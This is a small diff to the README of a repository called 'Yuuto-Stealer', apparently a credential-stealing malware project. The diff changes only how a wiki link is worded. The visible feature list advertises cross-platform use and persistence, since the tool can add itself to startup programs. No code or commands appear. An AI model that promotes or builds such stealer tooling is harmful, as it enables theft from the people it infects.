JustYuuto/Yuuto-Stealer/README.md

 ## Functionalities

 Some of these functionalities are customisable in the [`config.js`](config.js) file.
-You can find more details at https://github.com/JustYuuto/Grabber/wiki/Functionalities.
+You can find more details in [the wiki](https://github.com/JustYuuto/Grabber/wiki/Functionalities).
 Items in bold are functionalities you can get hyped with!

 * Made for Windows, but can work on macOS and Linux with Wine
 * Can add itself to startup programs